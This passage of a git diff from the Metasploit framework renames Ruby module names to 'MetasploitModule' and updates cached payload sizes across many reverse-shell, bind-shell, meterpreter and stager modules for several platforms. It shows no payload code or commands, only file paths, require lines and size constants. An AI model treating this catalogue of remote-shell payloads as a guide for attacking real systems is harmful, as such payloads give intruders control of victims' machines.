b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb @@ -11,9 +11,9 @@ require 'msf/base/sessions/meterpreter_x64_win' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit4 +module MetasploitModule - CachedSize = 1189955 + CachedSize = 1190467 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb index 519e5ed6d3..1ffc004cee 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb @@ -11,9 +11,9 @@ require 'msf/base/sessions/meterpreter_x64_win' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit4 +module MetasploitModule - CachedSize = 1188911 + CachedSize = 1189423 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb index 7ed67c7a06..01b46f82fc 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb @@ -11,9 +11,9 @@ require 'msf/base/sessions/meterpreter_x64_win' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit4 +module MetasploitModule - CachedSize = 1188911 + CachedSize = 1189423 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb index 7b16dad82d..921531bf8a 100644 --- a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb @@ -14,7 +14,7 @@ require 'msf/core/handler/bind_tcp' # Extends the Exec payload to add a new user. # ### -module Metasploit3 +module MetasploitModule CachedSize = 1786 diff --git a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb index 524d876cdc..b3dd0e42c7 100644 --- a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb @@ -14,7 +14,7 @@ require 'msf/core/handler/reverse_tcp_ssl' # Extends the Exec payload to add a new user. # ### -module Metasploit3 +module MetasploitModule CachedSize = 1794 diff --git a/modules/payloads/singles/windows/x64/shell_bind_tcp.rb b/modules/payloads/singles/windows/x64/shell_bind_tcp.rb index 75debdbd54..9fd2b45fb2 100644 --- a/modules/payloads/singles/windows/x64/shell_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 505 diff --git a/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb b/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb index 0a4ae497bb..d2b1bb8432 100644 --- a/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 460 diff --git a/modules/payloads/stagers/android/reverse_http.rb b/modules/payloads/stagers/android/reverse_http.rb index 87b2fbf319..1280aec874 100644 --- a/modules/payloads/stagers/android/reverse_http.rb +++ b/modules/payloads/stagers/android/reverse_http.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_http' require 'msf/core/payload/uuid/options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/stagers/android/reverse_https.rb b/modules/payloads/stagers/android/reverse_https.rb index fa93d598f4..0198ac0d8b 100644 --- a/modules/payloads/stagers/android/reverse_https.rb +++ b/modules/payloads/stagers/android/reverse_https.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_https' require 'msf/core/payload/uuid/options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/stagers/android/reverse_tcp.rb b/modules/payloads/stagers/android/reverse_tcp.rb index 6aa6aaa3fa..fe1949d130 100644 --- a/modules/payloads/stagers/android/reverse_tcp.rb +++ b/modules/payloads/stagers/android/reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb b/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb index d6fe01d68c..34c0eab79f 100644 --- a/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/bind_tcp' # BSD bind TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 63 diff --git a/modules/payloads/stagers/bsd/x86/bind_tcp.rb b/modules/payloads/stagers/bsd/x86/bind_tcp.rb index defab03f57..d03ccfb2ee 100644 --- a/modules/payloads/stagers/bsd/x86/bind_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/bind_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/bind_tcp' # BSD bind TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 54 diff --git a/modules/payloads/stagers/bsd/x86/find_tag.rb b/modules/payloads/stagers/bsd/x86/find_tag.rb index 5cad0b982e..0eee8c3051 100644 --- a/modules/payloads/stagers/bsd/x86/find_tag.rb +++ b/modules/payloads/stagers/bsd/x86/find_tag.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/find_tag' # BSD find tag stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 40 diff --git a/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb index e295af5b26..5506b36ec0 100644 --- a/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/reverse_tcp' # BSD reverse TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 81 diff --git a/modules/payloads/stagers/bsd/x86/reverse_tcp.rb b/modules/payloads/stagers/bsd/x86/reverse_tcp.rb index e044caaa4f..a09c2f6f68 100644 --- a/modules/payloads/stagers/bsd/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/reverse_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/reverse_tcp' # BSD reverse TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 43 diff --git a/modules/payloads/stagers/bsdi/x86/bind_tcp.rb b/modules/payloads/stagers/bsdi/x86/bind_tcp.rb index d7481715bd..5f6eda8d92 100644 --- a/modules/payloads/stagers/bsdi/x86/bind_tcp.rb +++ b/modules/payloads/stagers/bsdi/x86/bind_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/bind_tcp' # BSD bind TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 69 diff --git a/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb b/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb index 054aea36fd..c15d4b32d9 100644 --- a/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/reverse_tcp' # BSD reverse TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 59 diff --git a/modules/payloads/stagers/java/bind_tcp.rb b/modules/payloads/stagers/java/bind_tcp.rb index e68c528b82..d6d8c0e14e 100644 --- a/modules/payloads/stagers/java/bind_tcp.rb +++ b/modules/payloads/stagers/java/bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 5105 diff --git a/modules/payloads/stagers/java/reverse_http.rb b/modules/payloads/stagers/java/reverse_http.rb index f9087ea550..d6a34087cc 100644 --- a/modules/payloads/stagers/java/reverse_http.rb +++ b/modules/payloads/stagers/java/reverse_http.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/handler/reverse_http' -module Metasploit3 +module MetasploitModule CachedSize = 5123 diff --git a/modules/payloads/stagers/java/reverse_https.rb b/modules/payloads/stagers/java/reverse_https.rb index 9072228fbd..d58a67ac2f 100644 --- a/modules/payloads/stagers/java/reverse_https.rb +++ b/modules/payloads/stagers/java/reverse_https.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_https' require 'msf/core/payload/uuid/options' -module Metasploit3 +module MetasploitModule CachedSize = 5932 diff --git a/modules/payloads/stagers/java/reverse_tcp.rb b/modules/payloads/stagers/java/reverse_tcp.rb index ca9106a641..9cf7160f42 100644 --- a/modules/payloads/stagers/java/reverse_tcp.rb +++ b/modules/payloads/stagers/java/reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 5118 diff --git a/modules/payloads/stagers/linux/armle/bind_tcp.rb b/modules/payloads/stagers/linux/armle/bind_tcp.rb index 1a3e5300e7..963307b1da 100644 --- a/modules/payloads/stagers/linux/armle/bind_tcp.rb +++ b/modules/payloads/stagers/linux/armle/bind_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/bind_tcp' # Linux bind TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 232 diff --git a/modules/payloads/stagers/linux/armle/reverse_tcp.rb b/modules/payloads/stagers/linux/armle/reverse_tcp.rb index 8876eba6aa..9d5c456f45 100644 --- a/modules/payloads/stagers/linux/armle/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/armle/reverse_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/reverse_tcp' # Linux reverse TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 200 diff --git a/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb index 4f3481455b..081c85e869 100644 --- a/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 212 diff --git a/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb index 6274680cd0..b717932d91 100644 --- a/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 212 diff --git a/modules/payloads/stagers/linux/x64/bind_tcp.rb b/modules/payloads/stagers/linux/x64/bind_tcp.rb index e03be3f9bf..2fe49ef020 100644 --- a/modules/payloads/stagers/linux/x64/bind_tcp.rb +++ b/modules/payloads/stagers/linux/x64/bind_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 78 diff --git a/modules/payloads/stagers/linux/x64/reverse_tcp.rb b/modules/payloads/stagers/linux/x64/reverse_tcp.rb index b8adfa1a65..c499229c58 100644 --- a/modules/payloads/stagers/linux/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x64/reverse_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 68 diff --git a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb index 0106b03e01..4e0a657788 100644 --- a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/linux/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 120 diff --git a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb index 7b1e53a378..1f50b4d8ab 100644 --- a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb +++ b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/linux/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 165 diff --git a/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb b/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb index 64d035d5b6..64f0c73640 100644 --- a/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/bind_tcp' # Linux bind TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 63 diff --git a/modules/payloads/stagers/linux/x86/bind_tcp.rb b/modules/payloads/stagers/linux/x86/bind_tcp.rb index d72c328b3e..b49fdd595b 100644 --- a/modules/payloads/stagers/linux/x86/bind_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/linux/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 110 diff --git a/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb index 6ee52b7a80..47e905fb63 100644 --- a/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb +++ b/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/linux/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 155 diff --git a/modules/payloads/stagers/linux/x86/find_tag.rb b/modules/payloads/stagers/linux/x86/find_tag.rb index 13f6c4f0ef..967a6965da 100644 --- a/modules/payloads/stagers/linux/x86/find_tag.rb +++ b/modules/payloads/stagers/linux/x86/find_tag.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/find_tag' # Linux find tag stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 37 diff --git a/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb index 5812f24621..2dac77ebe7 100644 --- a/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' # Linux Reverse TCP/IPv6 Stager -module Metasploit3 +module MetasploitModule CachedSize = 77 diff --git a/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb index 6f0e0762c6..16c273185e 100644 --- a/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/reverse_tcp' # Linux reverse TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 50 diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_tcp.rb index 6127486d9c..2c2feaf11a 100644 --- a/modules/payloads/stagers/linux/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/core/payload/linux/reverse_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 71 diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb index 3f0d438f87..526e978f0e 100644 --- a/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/core/payload/linux/reverse_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 114 diff --git a/modules/payloads/stagers/netware/reverse_tcp.rb b/modules/payloads/stagers/netware/reverse_tcp.rb index 43a6199879..cce195a4c3 100644 --- a/modules/payloads/stagers/netware/reverse_tcp.rb +++ b/modules/payloads/stagers/netware/reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 281 diff --git a/modules/payloads/stagers/osx/armle/bind_tcp.rb b/modules/payloads/stagers/osx/armle/bind_tcp.rb index a39946b4ea..a65043fada 100644 --- a/modules/payloads/stagers/osx/armle/bind_tcp.rb +++ b/modules/payloads/stagers/osx/armle/bind_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/bind_tcp' # OSX bind TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 248 diff --git a/modules/payloads/stagers/osx/armle/reverse_tcp.rb b/modules/payloads/stagers/osx/armle/reverse_tcp.rb index e8eb886017..d7e214fed7 100644 --- a/modules/payloads/stagers/osx/armle/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/armle/reverse_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/reverse_tcp' # OSX reverse TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 184 diff --git a/modules/payloads/stagers/osx/ppc/bind_tcp.rb b/modules/payloads/stagers/osx/ppc/bind_tcp.rb index 5932c3309b..4ae1eee45d 100644 --- a/modules/payloads/stagers/osx/ppc/bind_tcp.rb +++ b/modules/payloads/stagers/osx/ppc/bind_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/bind_tcp' # OSX bind TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 152 diff --git a/modules/payloads/stagers/osx/ppc/find_tag.rb b/modules/payloads/stagers/osx/ppc/find_tag.rb index d2ceeea3e2..f30b0d7bb2 100644 --- a/modules/payloads/stagers/osx/ppc/find_tag.rb +++ b/modules/payloads/stagers/osx/ppc/find_tag.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/find_tag' # OSX find tag stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 76 diff --git a/modules/payloads/stagers/osx/ppc/reverse_tcp.rb b/modules/payloads/stagers/osx/ppc/reverse_tcp.rb index 8bf74f4a68..75b7f06b5c 100644 --- a/modules/payloads/stagers/osx/ppc/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/ppc/reverse_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/reverse_tcp' # OSX reverse TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 100 diff --git a/modules/payloads/stagers/osx/x64/bind_tcp.rb b/modules/payloads/stagers/osx/x64/bind_tcp.rb index 5abee59824..aebc72f921 100644 --- a/modules/payloads/stagers/osx/x64/bind_tcp.rb +++ b/modules/payloads/stagers/osx/x64/bind_tcp.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 185 diff --git a/modules/payloads/stagers/osx/x64/reverse_tcp.rb b/modules/payloads/stagers/osx/x64/reverse_tcp.rb index 9a799fbd22..c9976fdb7d 100644 --- a/modules/payloads/stagers/osx/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/x64/reverse_tcp.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 154 diff --git a/modules/payloads/stagers/osx/x86/bind_tcp.rb b/modules/payloads/stagers/osx/x86/bind_tcp.rb index c058ae14e3..64cc3a4ffa 100644 --- a/modules/payloads/stagers/osx/x86/bind_tcp.rb +++ b/modules/payloads/stagers/osx/x86/bind_tcp.rb @@ -14,7 +14,7 @@ require 'msf/core/handler/bind_tcp' # Mac OS X x86 bind TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 144 diff --git a/modules/payloads/stagers/osx/x86/reverse_tcp.rb b/modules/payloads/stagers/osx/x86/reverse_tcp.rb index 1c2d8d4e69..27dcd36cf6 100644 --- a/modules/payloads/stagers/osx/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/x86/reverse_tcp.rb @@ -14,7 +14,7 @@ require 'msf/core/handler/reverse_tcp' # Mac OS X x86 Reverse TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 123 diff --git a/modules/payloads/stagers/php/bind_tcp.rb b/modules/payloads/stagers/php/bind_tcp.rb index f2167c7690..5c283da8a5 100644 --- a/modules/payloads/stagers/php/bind_tcp.rb +++ b/modules/payloads/stagers/php/bind_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/php/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 1188 diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6.rb b/modules/payloads/stagers/php/bind_tcp_ipv6.rb index f8d16bb8de..6ebec08930 100644 --- a/modules/payloads/stagers/php/bind_tcp_ipv6.rb +++ b/modules/payloads/stagers/php/bind_tcp_ipv6.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/php/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 1187 diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb index bf90de7e90..a01609fac8 100644 --- a/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb +++ b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/php/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 1361 diff --git a/modules/payloads/stagers/php/bind_tcp_uuid.rb b/modules/payloads/stagers/php/bind_tcp_uuid.rb index 1f8397b4d1..8a7e263464 100644 --- a/modules/payloads/stagers/php/bind_tcp_uuid.rb +++ b/modules/payloads/stagers/php/bind_tcp_uuid.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/php/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 1362 diff --git a/modules/payloads/stagers/php/reverse_tcp.rb b/modules/payloads/stagers/php/reverse_tcp.rb index 9768010ca5..ffd8f880d7 100644 --- a/modules/payloads/stagers/php/reverse_tcp.rb +++ b/modules/payloads/stagers/php/reverse_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/core/payload/php/reverse_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 951 diff --git a/modules/payloads/stagers/php/reverse_tcp_uuid.rb b/modules/payloads/stagers/php/reverse_tcp_uuid.rb index e99e44664a..22d28fa075 100644 --- a/modules/payloads/stagers/php/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/php/reverse_tcp_uuid.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/core/payload/php/reverse_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 1125 diff --git a/modules/payloads/stagers/python/bind_tcp.rb b/modules/payloads/stagers/python/bind_tcp.rb index 113f9b4828..41c763ad2c 100644 --- a/modules/payloads/stagers/python/bind_tcp.rb +++ b/modules/payloads/stagers/python/bind_tcp.rb @@ -10,7 +10,7 @@ require 'msf/core/payload/python/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = 386 diff --git a/modules/payloads/stagers/python/bind_tcp_uuid.rb b/modules/payloads/stagers/python/bind_tcp_uuid.rb index ec327de75f..88c071564f 100644 --- a/modules/payloads/stagers/python/bind_tcp_uuid.rb +++ b/modules/payloads/stagers/python/bind_tcp_uuid.rb @@ -10,7 +10,7 @@ require 'msf/core/payload/python/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = 486 diff --git a/modules/payloads/stagers/python/reverse_http.rb b/modules/payloads/stagers/python/reverse_http.rb index 97874d9e5c..59edabedbe 100644 --- a/modules/payloads/stagers/python/reverse_http.rb +++ b/modules/payloads/stagers/python/reverse_http.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_http' require 'msf/core/payload/python' require 'msf/core/payload/python/reverse_http' -module Metasploit4 +module MetasploitModule CachedSize = 494 diff --git a/modules/payloads/stagers/python/reverse_https.rb b/modules/payloads/stagers/python/reverse_https.rb index bad7e55fea..7e94c41234 100644 --- a/modules/payloads/stagers/python/reverse_https.rb +++ b/modules/payloads/stagers/python/reverse_https.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_https' require 'msf/core/payload/python' require 'msf/core/payload/python/reverse_http' -module Metasploit4 +module MetasploitModule CachedSize = 762 diff --git a/modules/payloads/stagers/python/reverse_tcp.rb b/modules/payloads/stagers/python/reverse_tcp.rb index 7350a20022..367b3c8693 100644 --- a/modules/payloads/stagers/python/reverse_tcp.rb +++ b/modules/payloads/stagers/python/reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/payload/python/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = 362 diff --git a/modules/payloads/stagers/python/reverse_tcp_uuid.rb b/modules/payloads/stagers/python/reverse_tcp_uuid.rb index 80b038fdc4..55d36cde14 100644 --- a/modules/payloads/stagers/python/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/python/reverse_tcp_uuid.rb @@ -9,7 +9,7 @@ require 'msf/core/payload/python/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = 466 diff --git a/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb b/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb index 2f3d44d3ce..93c6296129 100644 --- a/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb +++ b/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 359 diff --git a/modules/payloads/stagers/windows/bind_hidden_tcp.rb b/modules/payloads/stagers/windows/bind_hidden_tcp.rb index 8c1bc33ccc..d8586a924c 100644 --- a/modules/payloads/stagers/windows/bind_hidden_tcp.rb +++ b/modules/payloads/stagers/windows/bind_hidden_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 343 diff --git a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb index 10aeea1af4..ad3e3bc080 100644 --- a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/windows/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 285 diff --git a/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb b/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb index 955625dd12..f7f5cf65f7 100644 --- a/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/windows/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 318 diff --git a/modules/payloads/stagers/windows/bind_nonx_tcp.rb b/modules/payloads/stagers/windows/bind_nonx_tcp.rb index 0e1bec0085..ee6cf243db 100644 --- a/modules/payloads/stagers/windows/bind_nonx_tcp.rb +++ b/modules/payloads/stagers/windows/bind_nonx_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 201 diff --git a/modules/payloads/stagers/windows/bind_tcp.rb b/modules/payloads/stagers/windows/bind_tcp.rb index c59304480d..7a37affda9 100644 --- a/modules/payloads/stagers/windows/bind_tcp.rb +++ b/modules/payloads/stagers/windows/bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/windows/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 285 diff --git a/modules/payloads/stagers/windows/bind_tcp_rc4.rb 